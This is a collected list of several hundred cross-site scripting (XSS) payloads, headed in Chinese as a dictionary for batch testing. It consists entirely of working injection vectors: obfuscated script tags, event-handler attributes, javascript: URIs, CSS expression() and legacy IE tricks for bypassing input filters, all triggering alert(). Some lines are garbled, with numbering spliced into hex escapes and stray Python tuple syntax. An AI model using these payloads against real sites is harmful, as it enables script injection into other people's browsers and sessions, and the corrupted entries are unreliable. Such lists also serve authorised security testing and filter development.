收集的XSS Payload ,可以做成字典,到时候批量测试:
------------------------------------------------------------------------------------
<script\x20type="text/javascript">javascript:alert();</script>
<script\x3Etype="text/javascript">javascript:alert();</script>
<script\x0Dtype="text/javascript">javascript:alert();</script>
<script\x09type="text/javascript">javascript:alert();</script>
<script\x0Ctype="text/javascript">javascript:alert();</script>
<script\x2Ftype="text/javascript">javascript:alert();</script>
<script\x0Atype="text/javascript">javascript:alert();</script>
'`"><\x3Cscript>javascript:alert(8)</script>
'`"><\x00script>javascript:alert(9)</script>
<img src= href= onerror="javascript:alert(10)"></img>
<audio src= href= onerror="javascript:alert(11)"></audio>
<video src= href= onerror="javascript:alert(12)"></video>
<body src= href= onerror="javascript:alert(13)"></body>
<image src= href= onerror="javascript:alert(14)"></image>
<object src= href= onerror="javascript:alert(15)"></object>
<script src= href= onerror="javascript:alert(16)"></script>
<svg onResize svg onResize="javascript:javascript:alert(17)"></svg onResize>
<title onPropertyChange title onPropertyChange="javascript:javascript:alert(18)"></title onPropertyChange>
<iframe onLoad iframe onLoad="javascript:javascript:alert(19)"></iframe onLoad>
<body onMouseEnter body onMouseEnter="javascript:javascript:alert(20)"></body onMouseEnter>
<body onFocus body onFocus="javascript:javascript:alert(21)"></body onFocus>
<frameset onScroll frameset onScroll="javascript:javascript:alert(22)"></frameset onScroll>
<script onReadyStateChange script onReadyStateChange="javascript:javascript:alert(23)"></script onReadyStateChange>
<html onMouseUp html onMouseUp="javascript:javascript:alert(24)"></html onMouseUp>
<body onPropertyChange body onPropertyChange="javascript:javascript:alert(25)"></body onPropertyChange>
<svg onLoad svg onLoad="javascript:javascript:alert(26)"></svg onLoad>
<body onPageHide body onPageHide="javascript:javascript:alert(27)"></body onPageHide>
<body onMouseOver body onMouseOver="javascript:javascript:alert(28)"></body onMouseOver>
<body onUnload body onUnload="javascript:javascript:alert(29)"></body onUnload>
<body onLoad body onLoad="javascript:javascript:alert(30)"></body onLoad>
<bgsound onPropertyChange bgsound onPropertyChange="javascript:javascript:alert(31)"></bgsound onPropertyChange>
<html onMouseLeave html onMouseLeave="javascript:javascript:alert(32)"></html onMouseLeave>
<html onMouseWheel html onMouseWheel="javascript:javascript:alert(33)"></html onMouseWheel>
<style onLoad style onLoad="javascript:javascript:alert(34)"></style onLoad>
<iframe onReadyStateChange iframe onReadyStateChange="javascript:javascript:alert(35)"></iframe onReadyStateChange>
<body onPageShow body onPageShow="javascript:javascript:alert(36)"></body onPageShow>
<style onReadyStateChange style onReadyStateChange="javascript:javascript:alert(37)"></style onReadyStateChange>
<frameset onFocus frameset onFocus="javascript:javascript:alert(38)"></frameset onFocus>
<applet onError applet onError="javascript:javascript:alert(39)"></applet onError>
<marquee onStart marquee onStart="javascript:javascript:alert(40)"></marquee onStart>
<script onLoad script onLoad="javascript:javascript:alert(41)"></script onLoad>
<html onMouseOver html onMouseOver="javascript:javascript:alert(42)"></html onMouseOver>
<html onMouseEnter html onMouseEnter="javascript:parent.javascript:alert(43)"></html onMouseEnter>
<body onBeforeUnload body onBeforeUnload="javascript:javascript:alert(44)"></body onBeforeUnload>
<html onMouseDown html onMouseDown="javascript:javascript:alert(45)"></html onMouseDown>
<marquee onScroll marquee onScroll="javascript:javascript:alert(46)"></marquee onScroll>
<xml onPropertyChange xml onPropertyChange="javascript:javascript:alert(47)"></xml onPropertyChange>
<frameset onBlur frameset onBlur="javascript:javascript:alert(48)"></frameset onBlur>
<applet onReadyStateChange applet onReadyStateChange="javascript:javascript:alert(49)"></applet onReadyStateChange>
<svg onUnload svg onUnload="javascript:javascript:alert(50)"></svg onUnload>
<html onMouseOut html onMouseOut="javascript:javascript:alert(51)"></html onMouseOut>
<body onMouseMove body onMouseMove="javascript:javascript:alert(52)"></body onMouseMove>
<body onResize body onResize="javascript:javascript:alert(53)"></body onResize>
<object onError object onError="javascript:javascript:alert(54)"></object onError>
<body onPopState body onPopState="javascript:javascript:alert(55)"></body onPopState>
<html onMouseMove html onMouseMove="javascript:javascript:alert(56)"></html onMouseMove>
<applet onreadystatechange applet onreadystatechange="javascript:javascript:alert(57)"></applet onreadystatechange>
<body onpagehide body onpagehide="javascript:javascript:alert(58)"></body onpagehide>
<svg onunload svg onunload="javascript:javascript:alert(59)"></svg onunload>
<applet onerror applet onerror="javascript:javascript:alert(60)"></applet onerror>
<body onkeyup body onkeyup="javascript:javascript:alert(61)"></body onkeyup>
<body onunload body onunload="javascript:javascript:alert(62)"></body onunload>
<iframe onload iframe onload="javascript:javascript:alert(63)"></iframe onload>
<body onload body onload="javascript:javascript:alert(64)"></body onload>
<html onmouseover html onmouseover="javascript:javascript:alert(65)"></html onmouseover>
<object onbeforeload object onbeforeload="javascript:javascript:alert(66)"></object onbeforeload>
<body onbeforeunload body onbeforeunload="javascript:javascript:alert(67)"></body onbeforeunload>
<body onfocus body onfocus="javascript:javascript:alert(68)"></body onfocus>
<body onkeydown body onkeydown="javascript:javascript:alert(69)"></body onkeydown>
<iframe onbeforeload iframe onbeforeload="javascript:javascript:alert(70)"></iframe onbeforeload>
<iframe src iframe src="javascript:javascript:alert(71)"></iframe src>
<svg onload svg onload="javascript:javascript:alert(72)"></svg onload>
<html onmousemove html onmousemove="javascript:javascript:alert(73)"></html onmousemove>
<body onblur body onblur="javascript:javascript:alert(74)"></body onblur>
\x3Cscript>javascript:alert()</script>
'"`><script>/* *\x2Fjavascript:alert(76)// */</script>
<script>javascript:alert()</script\x0D
<script>javascript:alert()</script\x0A
<script>javascript:alert()</script\x0B
<script charset="\x22>javascript:alert(80)</script>
<!--\x3E<img src=xxx:x onerror=javascript:alert()> -->
--><!-- ---> <img src=xxx:x onerror=javascript:alert()> -->
--><!-- --\x00> <img src=xxx:x onerror=javascript:alert()> -->
--><!-- --\x284> <img src=xxx:x onerror=javascript:alert()> -->
--><!-- --\x3E> <img src=xxx:x onerror=javascript:alert()> -->
`"'><img src='#\x27 onerror=javascript:alert(86)>
<a href="javascript\x3Ajavascript:alert(87)" id="fuzzelement87">test</a>
"'`><p><svg><script>a='hello\x27;javascript:alert(88)//';</script></p>
<a href="javas\x00cript:javascript:alert(89)" id="fuzzelement89">test</a>
<a href="javas\x07cript:javascript:alert(90)" id="fuzzelement90">test</a>
<a href="javas\x0Dcript:javascript:alert(91)" id="fuzzelement91">test</a>
<a href="javas\x0Acript:javascript:alert(92)" id="fuzzelement92">test</a>
<a href="javas\x08cript:javascript:alert(93)" id="fuzzelement93">test</a>
<a href="javas\x02cript:javascript:alert(94)" id="fuzzelement94">test</a>
<a href="javas\x03cript:javascript:alert(95)" id="fuzzelement95">test</a>
<a href="javas\x04cript:javascript:alert(96)" id="fuzzelement96">test</a>
<a href="javas\x097cript:javascript:alert(97)" id="fuzzelement97">test</a>
<a href="javas\x05cript:javascript:alert(98)" id="fuzzelement98">test</a>
<a href="javas\x0Bcript:javascript:alert(99)" id="fuzzelement99">test</a>
<a href="javas\x09cript:javascript:alert(100)" id="fuzzelement100">test</a>
<a href="javas\x06cript:javascript:alert(101)" id="fuzzelement101">test</a>
<a href="javas\x0Ccript:javascript:alert(102)" id="fuzzelement102">test</a>
<script>/* *\x2A/javascript:alert(103)// */</script>
<script>/* *\x00/javascript:alert(104)// */</script>
<style></style\x3E<img src="about:blank" onerror=javascript:alert()//></style>
<style></style\x0D<img src="about:blank" onerror=javascript:alert()//></style>
<style></style\x09<img src="about:blank" onerror=javascript:alert()//></style>
<style></style\x20<img src="about:blank" onerror=javascript:alert()//></style>
<style></style\x0A<img src="about:blank" onerror=javascript:alert()//></style>
"'`>ABC<div style="font-family:'foo'\x7Dx:expression(javascript:alert();/*';">DEF
"'`>ABC<div style="font-family:'foo'\x3Bx:expression(javascript:alert(111);/*';">DEF
<script>if("x\\xE112\x96\x89".length==2) { javascript:alert(112);}</script>
<script>if("x\\xE0\xB9\x92".length==2) { javascript:alert(113);}</script>
<script>if("x\\xEE\xA9\x93".length==2) { javascript:alert(114);}</script>
'`"><\x3Cscript>javascript:alert(115)</script>
'`"><\x00script>javascript:alert(116)</script>
"'`><\x3Cimg src=xxx:x onerror=javascript:alert(117)>
"'`><\x00img src=xxx:x onerror=javascript:alert(118)>
<script src="data:text/plain\x2Cjavascript:alert(119)"></script>
<script src="data:\xD4\x8F,javascript:alert(120)"></script>
<script src="data:\xE0\xA4\x98,javascript:alert(121)"></script>
<script src="data:\xCB\x8F,javascript:alert(122)"></script>
<script\x20type="text/javascript">javascript:alert(123);</script>
<script\x3Etype="text/javascript">javascript:alert(124);</script>
<script\x0Dtype="text/javascript">javascript:alert(125);</script>
<script\x09type="text/javascript">javascript:alert(126);</script>
<script\x0Ctype="text/javascript">javascript:alert(127);</script>
<script\x2Ftype="text/javascript">javascript:alert(128);</script>
<script\x0Atype="text/javascript">javascript:alert(129);</script>
ABC<div style="x\x3Aexpression(javascript:alert(130)">DEF
ABC<div style="x:expression\x5C(javascript:alert(131)">DEF
ABC<div style="x:expression\x00(javascript:alert(132)">DEF
ABC<div style="x:exp\x00ression(javascript:alert(133)">DEF
ABC<div style="x:exp\x5Cression(javascript:alert(134)">DEF
ABC<div style="x:\x0Aexpression(javascript:alert(135)">DEF
ABC<div style="x:\x09expression(javascript:alert(136)">DEF
ABC<div style="x:\xE3\x80\x80expression(javascript:alert(137)">DEF
ABC<div style="x:\xE2\x80\x84expression(javascript:alert(138)">DEF
ABC<div style="x:\xC2\xA0expression(javascript:alert(139)">DEF
ABC<div style="x:\xE2\x80\x80expression(javascript:alert(140)">DEF
ABC<div style="x:\xE2\x80\x8Aexpression(javascript:alert(141)">DEF
ABC<div style="x:\x0Dexpression(javascript:alert(142)">DEF
ABC<div style="x:\x0Cexpression(javascript:alert(143)">DEF
ABC<div style="x:\xE2\x80\x87expression(javascript:alert(144)">DEF
ABC<div style="x:\xEF\xBB\xBFexpression(javascript:alert(145)">DEF
ABC<div style="x:\x20expression(javascript:alert(146)">DEF
ABC<div style="x:\xE2\x80\x88expression(javascript:alert(147)">DEF
ABC<div style="x:\x00expression(javascript:alert(148)">DEF
ABC<div style="x:\xE2\x80\x8Bexpression(javascript:alert(149)">DEF
ABC<div style="x:\xE2\x80\x86expression(javascript:alert(150)">DEF
ABC<div style="x:\xE2\x80\x85expression(javascript:alert(151)">DEF
ABC<div style="x:\xE2\x80\x82expression(javascript:alert(152)">DEF
ABC<div style="x:\x0Bexpression(javascript:alert(153)">DEF
ABC<div style="x:\xE2\x80\x8154expression(javascript:alert(154)">DEF
ABC<div style="x:\xE2\x80\x83expression(javascript:alert(155)">DEF
ABC<div style="x:\xE2\x80\x89expression(javascript:alert(156)">DEF
<a href="\x0Bjavascript:javascript:alert(157)" id="fuzzelement157">test</a>
<a href="\x0Fjavascript:javascript:alert(158)" id="fuzzelement158">test</a>
<a href="\xC2\xA0javascript:javascript:alert(159)" id="fuzzelement159">test</a>
<a href="\x05javascript:javascript:alert(160)" id="fuzzelement160">test</a>
<a href="\xE161\xA0\x8Ejavascript:javascript:alert(161)" id="fuzzelement161">test</a>
<a href="\x1628javascript:javascript:alert(162)" id="fuzzelement162">test</a>
<a href="\x163163javascript:javascript:alert(163)" id="fuzzelement163">test</a>
<a href="\xE2\x80\x88javascript:javascript:alert(164)" id="fuzzelement164">test</a>
<a href="\xE2\x80\x89javascript:javascript:alert(165)" id="fuzzelement165">test</a>
<a href="\xE2\x80\x80javascript:javascript:alert(166)" id="fuzzelement166">test</a>
<a href="\x1677javascript:javascript:alert(167)" id="fuzzelement167">test</a>
<a href="\x03javascript:javascript:alert(168)" id="fuzzelement168">test</a>
<a href="\x0Ejavascript:javascript:alert(169)" id="fuzzelement169">test</a>
<a href="\x170Ajavascript:javascript:alert(170)" id="fuzzelement170">test</a>
<a href="\x00javascript:javascript:alert(171)" id="fuzzelement171">test</a>
<a href="\x1720javascript:javascript:alert(172)" id="fuzzelement172">test</a>
<a href="\xE2\x80\x82javascript:javascript:alert(173)" id="fuzzelement173">test</a>
<a href="\x20javascript:javascript:alert(174)" id="fuzzelement174">test</a>
<a href="\x1753javascript:javascript:alert(175)" id="fuzzelement175">test</a>
<a href="\x09javascript:javascript:alert(176)" id="fuzzelement176">test</a>
<a href="\xE2\x80\x8Ajavascript:javascript:alert(177)" id="fuzzelement177">test</a>
<a href="\x1784javascript:javascript:alert(178)" id="fuzzelement178">test</a>
<a href="\x1799javascript:javascript:alert(179)" id="fuzzelement179">test</a>
<a href="\xE2\x80\xAFjavascript:javascript:alert(180)" id="fuzzelement180">test</a>
<a href="\x181Fjavascript:javascript:alert(181)" id="fuzzelement181">test</a>
<a href="\xE2\x80\x8182javascript:javascript:alert(182)" id="fuzzelement182">test</a>
<a href="\x183Djavascript:javascript:alert(183)" id="fuzzelement183">test</a>
<a href="\xE2\x80\x87javascript:javascript:alert(184)" id="fuzzelement184">test</a>
<a href="\x07javascript:javascript:alert(185)" id="fuzzelement185">test</a>
<a href="\xE186\x9A\x80javascript:javascript:alert(186)" id="fuzzelement186">test</a>
<a href="\xE2\x80\x83javascript:javascript:alert(187)" id="fuzzelement187">test</a>
<a href="\x04javascript:javascript:alert(188)" id="fuzzelement188">test</a>
<a href="\x0189javascript:javascript:alert(189)" id="fuzzelement189">test</a>
<a href="\x08javascript:javascript:alert(190)" id="fuzzelement190">test</a>
<a href="\xE2\x80\x84javascript:javascript:alert(191)" id="fuzzelement191">test</a>
<a href="\xE2\x80\x86javascript:javascript:alert(192)" id="fuzzelement192">test</a>
<a href="\xE3\x80\x80javascript:javascript:alert(193)" id="fuzzelement193">test</a>
<a href="\x1942javascript:javascript:alert(194)" id="fuzzelement194">test</a>
<a href="\x0Djavascript:javascript:alert(195)" id="fuzzelement195">test</a>
<a href="\x0Ajavascript:javascript:alert(196)" id="fuzzelement196">test</a>
<a href="\x0Cjavascript:javascript:alert(197)" id="fuzzelement197">test</a>
<a href="\x1985javascript:javascript:alert(198)" id="fuzzelement198">test</a>
<a href="\xE2\x80\xA8javascript:javascript:alert(199)" id="fuzzelement199">test</a>
<a href="\x2006javascript:javascript:alert(200)" id="fuzzelement200">test</a>
<a href="\x02javascript:javascript:alert(201)" id="fuzzelement201">test</a>
<a href="\x202Bjavascript:javascript:alert(202)" id="fuzzelement202">test</a>
<a href="\x06javascript:javascript:alert(203)" id="fuzzelement203">test</a>
<a href="\xE2\x80\xA9javascript:javascript:alert(204)" id="fuzzelement204">test</a>
<a href="\xE2\x80\x85javascript:javascript:alert(205)" id="fuzzelement205">test</a>
<a href="\x206Ejavascript:javascript:alert(206)" id="fuzzelement206">test</a>
<a href="\xE2\x8207\x9Fjavascript:javascript:alert(207)" id="fuzzelement207">test</a>
<a href="\x208Cjavascript:javascript:alert(208)" id="fuzzelement208">test</a>
<a href="javascript\x00:javascript:alert(209)" id="fuzzelement209">test</a>
<a href="javascript\x3A:javascript:alert(210)" id="fuzzelement210">test</a>
<a href="javascript\x09:javascript:alert(211)" id="fuzzelement211">test</a>
<a href="javascript\x0D:javascript:alert(212)" id="fuzzelement212">test</a>
<a href="javascript\x0A:javascript:alert(213)" id="fuzzelement213">test</a>
`"'><img src=xxx:x \x0Aonerror=javascript:alert(214)>
`"'><img src=xxx:x \x22onerror=javascript:alert(215)>
`"'><img src=xxx:x \x0Bonerror=javascript:alert(216)>
`"'><img src=xxx:x \x0Donerror=javascript:alert(217)>
`"'><img src=xxx:x \x2Fonerror=javascript:alert(218)>
`"'><img src=xxx:x \x09onerror=javascript:alert(219)>
`"'><img src=xxx:x \x0Conerror=javascript:alert(220)>
`"'><img src=xxx:x \x00onerror=javascript:alert(221)>
`"'><img src=xxx:x \x27onerror=javascript:alert(222)>
`"'><img src=xxx:x \x20onerror=javascript:alert(223)>
"`'><script>\x3Bjavascript:alert(224)</script>
"`'><script>\x0Djavascript:alert(225)</script>
"`'><script>\xEF\xBB\xBFjavascript:alert(226)</script>
"`'><script>\xE2\x80\x8227javascript:alert(227)</script>
"`'><script>\xE2\x80\x84javascript:alert(228)</script>
"`'><script>\xE3\x80\x80javascript:alert(229)</script>
"`'><script>\x09javascript:alert(230)</script>
"`'><script>\xE2\x80\x89javascript:alert(231)</script>
"`'><script>\xE2\x80\x85javascript:alert(232)</script>
"`'><script>\xE2\x80\x88javascript:alert(233)</script>
"`'><script>\x00javascript:alert(234)</script>
"`'><script>\xE2\x80\xA8javascript:alert(235)</script>
"`'><script>\xE2\x80\x8Ajavascript:alert(236)</script>
"`'><script>\xE237\x9A\x80javascript:alert(237)</script>
"`'><script>\x0Cjavascript:alert(238)</script>
"`'><script>\x2Bjavascript:alert(239)</script>
"`'><script>\xF0\x90\x96\x9Ajavascript:alert(240)</script>
"`'><script>-javascript:alert(241)</script>
"`'><script>\x0Ajavascript:alert(242)</script>
"`'><script>\xE2\x80\xAFjavascript:alert(243)</script>
"`'><script>\x7Ejavascript:alert(244)</script>
"`'><script>\xE2\x80\x87javascript:alert(245)</script>
"`'><script>\xE2\x8246\x9Fjavascript:alert(246)</script>
"`'><script>\xE2\x80\xA9javascript:alert(247)</script>
"`'><script>\xC2\x85javascript:alert(248)</script>
"`'><script>\xEF\xBF\xAEjavascript:alert(249)</script>
"`'><script>\xE2\x80\x83javascript:alert(250)</script>
"`'><script>\xE2\x80\x8Bjavascript:alert(251)</script>
"`'><script>\xEF\xBF\xBEjavascript:alert(252)</script>
"`'><script>\xE2\x80\x80javascript:alert(253)</script>
"`'><script>\x2254javascript:alert(254)</script>
"`'><script>\xE2\x80\x82javascript:alert(255)</script>
"`'><script>\xE2\x80\x86javascript:alert(256)</script>
"`'><script>\xE257\xA0\x8Ejavascript:alert(257)</script>
"`'><script>\x0Bjavascript:alert(258)</script>
"`'><script>\x20javascript:alert(259)</script>
"`'><script>\xC2\xA0javascript:alert(260)</script>
"/><img/onerror=\x0Bjavascript:alert(261)\x0Bsrc=xxx:x />
"/><img/onerror=\x22javascript:alert(262)\x22src=xxx:x />
"/><img/onerror=\x09javascript:alert(263)\x09src=xxx:x />
"/><img/onerror=\x27javascript:alert(264)\x27src=xxx:x />
"/><img/onerror=\x0Ajavascript:alert(265)\x0Asrc=xxx:x />
"/><img/onerror=\x0Cjavascript:alert(266)\x0Csrc=xxx:x />
"/><img/onerror=\x0Djavascript:alert(267)\x0Dsrc=xxx:x />
"/><img/onerror=\x60javascript:alert(268)\x60src=xxx:x />
"/><img/onerror=\x20javascript:alert(269)\x20src=xxx:x />
<script\x2F>javascript:alert(270)</script>
<script\x20>javascript:alert(271)</script>
<script\x0D>javascript:alert(272)</script>
<script\x0A>javascript:alert(273)</script>
<script\x0C>javascript:alert(274)</script>
<script\x00>javascript:alert(275)</script>
<script\x09>javascript:alert(276)</script>
`"'><img src=xxx:x onerror\x0B=javascript:alert(277)>
`"'><img src=xxx:x onerror\x00=javascript:alert(278)>
`"'><img src=xxx:x onerror\x0C=javascript:alert(279)>
`"'><img src=xxx:x onerror\x0D=javascript:alert(280)>
`"'><img src=xxx:x onerror\x20=javascript:alert(281)>
`"'><img src=xxx:x onerror\x0A=javascript:alert(282)>
`"'><img src=xxx:x onerror\x09=javascript:alert(283)>
<script>javascript:alert(284)<\x00/script>
<img src=# onerror\x3D"javascript:alert(285)" >
<input onfocus=javascript:alert(286) autofocus>
<input onblur=javascript:alert(287) autofocus><input autofocus>
<video poster=javascript:javascript:alert(288)//
<body onscroll=javascript:alert(289)><br><br><br><br><br><br>...<br><br><br><br><br><br><br><br><br><br>...<br><br><br><br><br><br><br><br><br><br>...<br><br><br><br><br><br><br><br><br><br>...<br><br><br><br><br><br><br><br><br><br>...<br><br><br><br><input autofocus>
<form id=test onforminput=javascript:alert(290)><input></form><button form=test onformchange=javascript:alert(290)>X
<video><source onerror="javascript:javascript:alert(291)">
<video onerror="javascript:javascript:alert(292)"><source>
<form><button formaction="javascript:javascript:alert(293)">X
<body oninput=javascript:alert(294)><input autofocus>
<math href="javascript:javascript:alert(295)">CLICKME</math> <math> <maction actiontype="statusline#http://google.com" xlink:href="javascript:javascript:alert(295)">CLICKME</maction> </math>
<frameset onload=javascript:alert(296)>
<table background="javascript:javascript:alert(297)">
<!--<img src="--><img src=x onerror=javascript:alert(298)//">
<comment><img src="</comment><img src=x onerror=javascript:alert(299))//">
<![><img src="]><img src=x onerror=javascript:alert(300)//">
<style><img src="</style><img src=x onerror=javascript:alert(301)//">
<li style=list-style:url() onerror=javascript:alert(302)> <div style=content:url(data:image/svg+xml,%%3Csvg/%%3E);visibility:hidden onload=javascript:alert(302)></div>
<head><base href="javascript://"></head><body><a href="/. /,javascript:alert(303)//#">XXX</a></body>
<SCRIPT FOR=document EVENT=onreadystatechange>javascript:alert(304)</SCRIPT>
<OBJECT CLASSID="clsid:333C7BC4-460F-305305D0-BC04-0080C7055A83"><PARAM NAME="DataURL" VALUE="javascript:alert(305)"></OBJECT>
<b <script>alert(308)</script>0
<div id="div309"><input value="``onmouseover=javascript:alert(309)"></div> <div id="div2"></div><script>document.getElementById("div2").innerHTML = document.getElementById("div309").innerHTML;</script>
<x '="foo"><x foo='><img src=x onerror=javascript:alert(310)//'>
<embed src="javascript:alert(311)">
<img src="javascript:alert(312)">
<image src="javascript:alert(313)">
<script src="javascript:alert(314)">
<div style=width:315px;filter:glow onfilterchange=javascript:alert(315)>x
<? foo="><script>javascript:alert(316)</script>">
<! foo="><script>javascript:alert(317)</script>">
</ foo="><script>javascript:alert(318)</script>">
<? foo="><x foo='?><script>javascript:alert(319)</script>'>">
<! foo="[[[Inception]]"><x foo="]foo><script>javascript:alert(320)</script>">
<% foo><x foo="%><script>javascript:alert(321)</script>">
<div id=d><x xmlns="><iframe onload=javascript:alert(322)"></div> <script>d.innerHTML=d.innerHTML</script>
<img \x00src=x onerror="alert(323)">
<img \x47src=x onerror="javascript:alert(324)">
<img \x325325src=x onerror="javascript:alert(325)">
<img \x3262src=x onerror="javascript:alert(326)">
<img\x47src=x onerror="javascript:alert(327)">
<img\x3280src=x onerror="javascript:alert(328)">
<img\x3293src=x onerror="javascript:alert(329)">
<img\x32src=x onerror="javascript:alert(330)">
<img\x47src=x onerror="javascript:alert(331)">
<img\x332332src=x onerror="javascript:alert(332)">
<img \x47src=x onerror="javascript:alert(333)">
<img \x34src=x onerror="javascript:alert(334)">
<img \x39src=x onerror="javascript:alert(335)">
<img \x00src=x onerror="javascript:alert(336)">
<img src\x09=x onerror="javascript:alert(337)">
<img src\x3380=x onerror="javascript:alert(338)">
<img src\x3393=x onerror="javascript:alert(339)">
<img src\x32=x onerror="javascript:alert(340)">
<img src\x3412=x onerror="javascript:alert(341)">
<img src\x342342=x onerror="javascript:alert(342)">
<img src\x00=x onerror="javascript:alert(343)">
<img src\x47=x onerror="javascript:alert(344)">
<img src=x\x09onerror="javascript:alert(345)">
<img src=x\x3460onerror="javascript:alert(346)">
<img src=x\x347347onerror="javascript:alert(347)">
<img src=x\x3482onerror="javascript:alert(348)">
<img src=x\x3493onerror="javascript:alert(349)">
<img[a][b][c]src[d]=x[e]onerror=[f]"alert(350)">
<img src=x onerror=\x09"javascript:alert(351)">
<img src=x onerror=\x3520"javascript:alert(352)">
<img src=x onerror=\x353353"javascript:alert(353)">
<img src=x onerror=\x3542"javascript:alert(354)">
<img src=x onerror=\x32"javascript:alert(355)">
<img src=x onerror=\x00"javascript:alert(356)">
<a href=java&#357&#2&#3&#4&#5&#6&#7&#8&#357357&#3572script:javascript:alert(357)>XXX</a>
<img src="x` `<script>javascript:alert(358)</script>"` `>
<img src onerror /" '"= alt=javascript:alert(359)//">
<title onpropertychange=javascript:alert(360)></title><title title=>
<a href=http://foo.bar/#x=`y></a><img alt="`><img src=x:x onerror=javascript:alert(361)></a>">
<!--[if]><script>javascript:alert(362)</script -->
<!--[if<img src=x onerror=javascript:alert(363)//]> -->
<object id="x" classid="clsid:CB927D3662-4FF7-4a9e-A36669-56E4B8A75598"></object> <object classid="clsid:02BF25D5-8C3667-4B23-BC80-D3488ABDDC6B" onqt_error="javascript:alert(366)" style="behavior:url(#x);"><param name=postdomevents /></object>
<a style="-o-link:'javascript:javascript:alert(367)';-o-link-source:current">X
<style>p[foo=bar{}*{-o-link:'javascript:javascript:alert(368)'}{}*{-o-link-source:current}]{color:red};</style>
<link rel=stylesheet href=data:,*%7bx:expression(javascript:alert(369))%7d
<style>@import "data:,*%7bx:expression(javascript:alert(370))%7D";</style>
<a style="pointer-events:none;position:absolute;"><a style="position:absolute;" onclick="javascript:alert(371);">XXX</a></a><a href="javascript:javascript:alert(371)">XXX</a>
<// style=x:expression\28javascript:alert(375)\29>
<style>*{x:expression(javascript:alert(376))}</style>
<div style="list-style:url(http://foo.f)\20url(javascript:javascript:alert(378));">X
<script>({set/**/$($){_/**/setter=$,_=javascript:alert()}}).$=eval</script>
<script>({:#=eval/##/##(javascript:alert())})</script>
<script>ReferenceError.prototype.__defineGetter__('name', function(){javascript:alert()}),x</script>
<script>Object.__noSuchMethod__ = Function,[{}][].constructor._('javascript:alert(387)')()</script>
<meta charset="mac-farsi">¼script¾javascript:alert()¼/script¾
X<x style=`behavior:url(#default#time2)` onbegin=`javascript:alert()` >
<set/xmlns=`urn:schemas-microsoft-com:time` style=`beh&#x4392vior:url(#default#time2)` attributename=`innerhtml` to=`&lt;img/src=&quot;x&quot;onerror=javascript:alert()&gt;`>
<animate/xmlns=urn:schemas-microsoft-com:time style=behavior:url(#default#time2) attributename=innerhtml values=&lt;img/src=&quot;.&quot;onerror=javascript:alert()&gt;>
<a href=#><line xmlns=urn:schemas-microsoft-com:vml style=behavior:url(#default#vml);position:absolute href=javascript:javascript:alert() strokecolor=white strokeweight=395000px from= to= /></a>
<a style="behavior:url(#default#AnchorClick);" folder="javascript:javascript:alert(396)">XXX</a>
<event-source src="%(event)s" onload="javascript:alert(399)">
<a href="javascript:javascript:alert(400)"><event-source src="data:application/x-dom-event-stream,Event:click%0Adata:XXX%0A%0A">
<div id="x">x</div> <xml:namespace prefix="t"> <import namespace="t" implementation="#default#time2"> <t:set attributeName="innerHTML" targetElement="x" to="&lt;img񡿹src=x:x񡿹onerror񡿹=javascript:alert(401)&gt;">
<script>javascript:alert()</script>
<IMG SRC="javascript:javascript:alert(406);">
<IMG SRC=javascript:javascript:alert()>
<IMG SRC=`javascript:javascript:alert()`>
<FRAMESET><FRAME SRC="javascript:javascript:alert(410);"></FRAMESET>
<BODY ONLOAD=javascript:alert()>
<BODY ONLOAD=javascript:javascript:alert()>
<IMG SRC="jav ascript:javascript:alert(413);">
<BODY onload!#$%%&()*~+-_.,:;?@[/|\]^`=javascript:alert()>
<IMG SRC="javascript:javascript:alert(417)"
<INPUT TYPE="IMAGE" SRC="javascript:javascript:alert(419);">
<IMG DYNSRC="javascript:javascript:alert(420)">
<IMG LOWSRC="javascript:javascript:alert(421)">
<BGSOUND SRC="javascript:javascript:alert(422);">
<BR SIZE="&{javascript:alert(423)}">
<LINK REL="stylesheet" HREF="javascript:javascript:alert(425);">
<STYLE>li {list-style-image: url("javascript:javascript:alert(429)");}</STYLE><UL><LI>XSS
<META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:javascript:alert(430);">
<META HTTP-EQUIV="refresh" CONTENT="0; URL=http://;URL=javascript:javascript:alert(431);">
<IFRAME SRC="javascript:javascript:alert(432);"></IFRAME>
<TABLE BACKGROUND="javascript:javascript:alert(433)">
<TABLE><TD BACKGROUND="javascript:javascript:alert(434)">
<DIV STYLE="background-image: url(javascript:javascript:alert(435))">
<DIV STYLE="width:expression(javascript:alert(436));">
<IMG STYLE="xss:expr/*XSS*/ession(javascript:alert(437))">
<XSS STYLE="xss:expression(javascript:alert(438))">
<STYLE TYPE="text/javascript">javascript:alert();</STYLE>
<STYLE>.XSS{background-image:url("javascript:javascript:alert(440)");}</STYLE><A CLASS=XSS></A>
<STYLE type="text/css">BODY{background:url("javascript:javascript:alert(441)")}</STYLE>
<!--[if gte IE ]><SCRIPT>javascript:alert();</SCRIPT><![endif]-->
<BASE HREF="javascript:javascript:alert(443);//">
<OBJECT classid=clsid:ae24fdae-03c6-445445d445-8b76-0080c744f389><param name=url value=javascript:javascript:alert()></OBJECT>
<HTML xmlns:xss><?import namespace="xss" implementation="%(htc)s"><xss:xss>XSS</xss:xss></HTML>""","XML namespace."),("""<XML ID="xss"><I><B>&lt;IMG SRC="javas<!-- -->cript:javascript:alert(446)"&gt;</B></I></XML><SPAN DATASRC="#xss" DATAFLD="B" DATAFORMATAS="HTML"></SPAN>
<HTML><BODY><?xml:namespace prefix="t" ns="urn:schemas-microsoft-com:time"><?import namespace="t" implementation="#default#time2"><t:set attributeName="innerHTML" to="XSS&lt;SCRIPT DEFER&gt;javascript:alert(447)&lt;/SCRIPT&gt;"></BODY></HTML>
<form id="test" /><button form="test" formaction="javascript:javascript:alert(450)">X
<body onscroll=javascript:alert()><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><input autofocus>
<P STYLE="behavior:url('#default#time2')" end="" onEnd="javascript:alert(452)">
<STYLE>a{background:url('s454' 's2)}@import javascript:javascript:alert(454);');}</STYLE>
<meta charset= "x-imap4-modified-utf7"&&>&&<script&&>javascript:alert()&&;&&<&&/script&&>
<SCRIPT onreadystatechange=javascript:javascript:alert();></SCRIPT>
<style onreadystatechange=javascript:javascript:alert();></style>
<?xml version="458.0"?><html:html xmlns:html='http://www.w3.org/458999/xhtml'><html:script>javascript:alert();</html:script></html:html>
<embed code=javascript:javascript:alert();></embed>
<frameset onload=javascript:javascript:alert()></frameset>
<object onerror=javascript:javascript:alert()>
<XML ID=I><X><C><![CDATA[<IMG SRC="javas]]<![CDATA[cript:javascript:alert(465);">]]</C><X></xml>
<IMG SRC=&{javascript:alert();};>
